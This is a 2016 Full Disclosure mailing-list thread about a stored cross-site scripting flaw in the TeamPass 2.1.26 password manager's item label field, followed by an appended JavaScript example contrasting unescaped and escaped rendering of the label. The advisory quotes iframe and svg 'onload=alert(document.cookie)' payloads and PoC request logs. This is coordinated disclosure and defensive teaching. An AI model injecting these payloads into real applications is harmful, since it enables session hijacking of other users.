Message-ID: <86a64e14-5538-43e5-9f6a-1937e2c19c36@gmail.com>
Date: Thu, 26 May 2016 10:40:40 +0200
From: Peter Kok <pk212111@...il.com>
To: Ulisses Montenegro <ulisses.montenegro@...il.com>,
Vulnerability Lab <research@...nerability-lab.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
Hi Ulisses,

The XSS found is a different one. The one mentioned on
https://github.com/nilsteampassnet/TeamPass/issues/1244 has a screenshot
where the XSS is inserted when creating a new role and by preventing the
JavaScript filters from executing. A new role can only be created by the
admin user. This XSS is also performed by inserting the <script> tag;
this tag does not work in the newly found bug.

The newly found XSS (http://www.vulnerability-lab.com/get_content.php?id=1845) is
inserted in the label field of an item; this can be done by any
authenticated user that can create or edit an item. The XSS is executed
as soon as a user opens the folder that contains the item with the XSS
in the label field.

Peter
On 25-5-2016 at 13:05, Ulisses Montenegro wrote:
> This looks very similar to the persistent XSS reported a while ago on the
> Teampass github, is it the same vulnerability?
>
> https://github.com/nilsteampassnet/TeamPass/issues/1244
>
>
>
> On 25 May 2016 at 19:10, Vulnerability Lab <research@...nerability-lab.com>
> wrote:
>
>> Document Title:
>> ===============
>> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
>>
>>
>> References (Source):
>> ====================
>> http://www.vulnerability-lab.com/get_content.php?id=1845
>>
>>
>> Release Date:
>> =============
>> 2016-05-24
>>
>>
>> Vulnerability Laboratory ID (VL-ID):
>> ====================================
>> 1845
>>
>>
>> Common Vulnerability Scoring System:
>> ====================================
>> 3.4
>>
>>
>> Product & Service Introduction:
>> ===============================
>> TeamPass is a password manager dedicated to managing passwords in a
>> collaborative way on any Apache, MySQL and PHP server.
>> It is especially designed to provide password access security for allowed
>> people. This makes TeamPass really useful in a
>> business/enterprise environment and provides IT or team managers with a
>> powerful and easy tool for customizing password
>> access depending on the user's role.
>>
>> (Copy of the Homepage: http://teampass.net/ )
>>
>>
>> Abstract Advisory Information:
>> ==============================
>> An independent vulnerability laboratory researcher discovered an
>> application-side cross site scripting vulnerability in the Teampass
>> v2.1.25/26 application.
>>
>>
>> Vulnerability Disclosure Timeline:
>> ==================================
>> 2016-05-17: Researcher Notification & Coordination (Peter Kok)
>> 2016-05-18: Vendor Notification (Teampass Security Team)
>> 2016-05-18: Vendor Response/Feedback (Teampass Security Team)
>> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team)
>> 2016-05-24: Public Disclosure (Vulnerability Laboratory)
>>
>>
>> Discovery Status:
>> =================
>> Published
>>
>>
>> Affected Product(s):
>> ====================
>> Nils Laumaillé
>> Product: Teampass Password Manager - Online Service (Web-Application)
>> 2.1.25
>>
>> Nils Laumaillé
>> Product: Teampass Password Manager - Online Service (Web-Application)
>> 2.1.26
>>
>>
>> Exploitation Technique:
>> =======================
>> Remote
>>
>>
>> Severity Level:
>> ===============
>> Medium
>>
>>
>> Technical Details & Description:
>> ================================
>> An application-side cross site scripting web vulnerability has been
>> discovered in the official Teampass v2.1.26 web-application.
>> The vulnerability allows remote attackers to inject their own malicious
>> script code into the application side of the vulnerable module or function.
>>
>> Teampass allows authenticated users to create items to store usernames,
>> passwords, descriptions, files and more. When creating or editing an
>> item, the very first field, the label field, is vulnerable to iframe
>> injection and XSS insertion. The iframe or cross site scripting will be
>> executed as soon as a user opens a folder. The attack vector is persistent
>> and the request method to inject is POST.
>>
>> The security risk of the application-side vulnerability is estimated as
>> medium with a CVSS (Common Vulnerability Scoring System) score of 3.4.
>> Exploitation of the persistent web vulnerability requires a low-privileged
>> web-application user account and low or medium user interaction.
>> Successful exploitation of the vulnerability results in session hijacking,
>> persistent phishing attacks, persistent external redirects to
>> malicious sources and persistent manipulation of affected or connected
>> application modules.
>>
>> Request Method(s):
>> [+] POST
>>
>> Vulnerable Function(s):
>> [+] Add or Edit (Label)
>>
>> Vulnerable Parameter(s):
>> [+] label name
>>
>> Affected Module(s):
>> [+] Item Listing
>>
>>
>> Proof of Concept (PoC):
>> =======================
>> The persistent cross site scripting web vulnerability can be exploited by
>> remote attackers without a privileged web-application user account and low
>> or medium user interaction.
>> For security demonstration or to reproduce the vulnerability, follow the
>> provided information and steps below.
>>
>> Manual steps to reproduce the vulnerability ...
>> 1. Create or edit an item
>> 2. Change the first label name field to a script code payload
>> Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"
>> onload=alert(document.cookie)<></iframe> or
>> <svg/onload=alert(document.cookie)>
>> 3. The execution occurs in the main label field output context value
>> 4. Successful reproduction of the application-side vulnerability!
>>
>>
>> --- PoC Session Logs [POST] ---
>> Status: 200[OK]
>> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>> Mime Type[application/json]
>> Request Header:
>> Host[teampass.localhost:8080]
>> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
>> Gecko/20100101 Firefox/46.0]
>> Accept[application/json, text/javascript, */*; q=0.01]
>> X-Requested-With[XMLHttpRequest]
>> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
>> PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>> Connection[keep-alive]
>> POST data:
>> cproject_id[23]
>> password_id[73]
>> name[Dans+Linux+user+%22%3E%3C[SCRIPT CODE PAYLOAD INJECT VIA NAME LABEL!]%3E]
>> tags[]
>> hidden-tags[]
>> access_info[]
>> faketextdonotautofill1[]
>> username[dan]
>> faketextdonotautofill2[]
>> email[]
>> fakepwddonotautofill1[]
>> password[hello]
>> password_visible[hello]
>> fakepwddonotautofill2[]
>> repeat_password[hello]
>> repeat_password_visible[hello]
>> expiry_date_edit[]
>> notes[]
>> Response Header:
>> Date[Wed, 25 May 2016 08:53:48 GMT]
>> Server[Apache]
>> X-Powered-By[PHP/5.4.4-14+deb7u8]
>> Expires[Thu, 19 Nov 1981 08:52:00 GMT]
>> Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0]
>> Pragma[no-cache]
>> Content-Length[74]
>> Keep-Alive[timeout=5, max=99]
>> Connection[Keep-Alive]
>> Content-Type[application/json; charset=utf-8]
>> -
>> Status: 200[OK]
>> GET http://teampass.localhost:8080/index.php/checkss/n/pwd
>> Mime Type[text/html]
>> Request Header:
>> Host[teampass.localhost:8080]
>> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
>> Gecko/20100101 Firefox/46.0]
>> Accept[text/html, */*; q=0.01]
>> X-Requested-With[XMLHttpRequest]
>> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
>> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1;
>> __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
>> Connection[keep-alive]
>> Response Header:
>> Date[Wed, 25 May 2016 08:53:49 GMT]
>> Server[Apache]
>> X-Powered-By[PHP/5.4.4-14+deb7u8]
>> Connection[Keep-Alive]
>> Content-Type[text/html]
>>
>>
>> Reference(s):
>> http://teampass.localhost:8080/
>> http://teampass.localhost:8080/index.php/
>> http://teampass.localhost:8080/index.php/pwd/
>> http://teampass.localhost:8080/index.php/checkss/
>> http://teampass.localhost:8080/index.php/checkss/n/
>> http://teampass.localhost:8080/index.php/checkss/n/pwd
>> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/
>> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>>
>>
>> Security Risk:
>> ==============
>> The security risk of the application-side cross site scripting
>> vulnerability in the teampass application is estimated as medium. (CVSS 3.4)
>>
>>
>> Credits & Authors:
>> ==================
>> Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
>>
>>
>> Disclaimer & Information:
>> =========================
>> The information provided in this advisory is provided as is without any
>> warranty. Vulnerability Lab disclaims all warranties, either expressed or
>> implied, including the warranties of merchantability and capability for a
>> particular purpose. Vulnerability-Lab or its suppliers are not liable in
>> any case of damage, including direct, indirect, incidental, consequential
>> loss of business profits or special damages, even if Vulnerability-Lab or
>> its suppliers have been advised of the possibility of such damages. Some
>> states do not allow the exclusion or limitation of liability for
>> consequential or incidental damages, so the foregoing limitation may not
>> apply. We do not approve or encourage anybody to break any licenses,
>> policies, deface websites, hack into databases or trade with stolen data.
>>
>> Domains: www.vulnerability-lab.com - www.vuln-lab.com
>> - www.evolution-sec.com
>> Contact: admin@...nerability-lab.com -
>> research@...nerability-lab.com -
>> admin@...lution-sec.com
>> Section: magazine.vulnerability-lab.com -
>> vulnerability-lab.com/contact.php -
>> evolution-sec.com/contact
>> Social: twitter.com/vuln_lab -
>> facebook.com/VulnerabilityLab -
>> youtube.com/user/vulnerability0lab
>> Feeds: vulnerability-lab.com/rss/rss.php -
>> vulnerability-lab.com/rss/rss_upcoming.php -
>> vulnerability-lab.com/rss/rss_news.php
>> Programs: vulnerability-lab.com/submit.php -
>> vulnerability-lab.com/list-of-bug-bounty-programs.php -
>> vulnerability-lab.com/register.php
>>
>> Any modified copy or reproduction, including partial usage, of this
>> file requires authorization from Vulnerability Laboratory. Permission to
>> electronically redistribute this alert in its unmodified form is granted.
>> All other rights, including the use of other media, are reserved by
>> Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
>> advisories, source code, videos and other information on this website are
>> trademarks of the vulnerability-lab team and the specific authors or
>> managers. To record, list, modify, use or edit our material, contact
>> (admin@ or research@...nerability-lab.com) to ask for permission.
>>
>> Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
>>
>>
>>
>>
>> --
>> VULNERABILITY LABORATORY - RESEARCH TEAM
>> SERVICE: www.vulnerability-lab.com
>> CONTACT: research@...nerability-lab.com
>>
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>
>
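The label-field rendering problem the advisory describes, as an added example that is not TeamPass code and not part of the original thread: a row template that concatenates the stored item label straight into HTML (the injectable pattern) beside one that entity-encodes every untrusted value before it lands in element content or a quoted attribute (the fix). The item shape, the row markup and the helper names are assumptions made for this illustration; the two payloads are the ones quoted in the advisory's PoC section.

```javascript
// Added illustration, not TeamPass's own code. The item shape and the
// row markup below are assumptions; only the payloads come from the
// advisory's PoC section.

// Payloads quoted in the advisory (the second is the svg variant).
const ADVISORY_PAYLOADS = [
  'Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/" onload=alert(document.cookie)<></iframe>',
  '<svg/onload=alert(document.cookie)>',
];

// Constructed sample record, shaped like what a label-edit endpoint
// might persist after the POST shown in the advisory.
const sampleItem = { id: 73, label: ADVISORY_PAYLOADS[1], username: 'dan' };

// Injectable pattern: the stored label is interpolated into markup as-is,
// so any tag inside it becomes live HTML the moment the folder listing
// that contains the item is rendered.
function renderRowUnsafe(item) {
  return `<tr data-id="${item.id}">` +
    `<td class="label">${item.label}</td>` +
    `<td class="user">${item.username}</td></tr>`;
}

// Entity-encode the five characters that can change meaning in element
// content or inside a double- or single-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every untrusted value is encoded for the context it
// lands in, and attribute values stay quoted so an encoded quote cannot
// terminate them. The payloads are shown verbatim as text, never parsed.
function renderRowSafe(item) {
  return `<tr data-id="${escapeHtml(item.id)}">` +
    `<td class="label">${escapeHtml(item.label)}</td>` +
    `<td class="user">${escapeHtml(item.username)}</td></tr>`;
}

// Count opening/closing tags in a rendered row. The template itself always
// contributes the same fixed number, so any surplus came from the label.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}
const TEMPLATE_TAG_COUNT = countTags(renderRowSafe({ id: 0, label: '', username: '' }));

// True when rendering `label` through `renderFn` adds markup of its own,
// i.e. the renderer is injectable via that label.
function labelInjectsMarkup(renderFn, label) {
  return countTags(renderFn({ id: 0, label, username: '' })) > TEMPLATE_TAG_COUNT;
}

// Run both renderers over both payloads and report which are exploitable.
function auditRenderers() {
  return ADVISORY_PAYLOADS.map((label) => ({
    label,
    unsafeInjectable: labelInjectsMarkup(renderRowUnsafe, label),
    safeInjectable: labelInjectsMarkup(renderRowSafe, label),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderRowUnsafe(sampleItem));
  console.log(renderRowSafe(sampleItem));
  console.table(auditRenderers());
}
```

The same rule applies whichever side builds the listing: in DOM-building client code, assign the label with `textContent` or `createTextNode` rather than `innerHTML`; in PHP templates, pass it through `htmlspecialchars($label, ENT_QUOTES, 'UTF-8')`. Rejecting `<script>` on input, which Peter notes is already done for roles, does not help here because the advisory's payloads never use that tag.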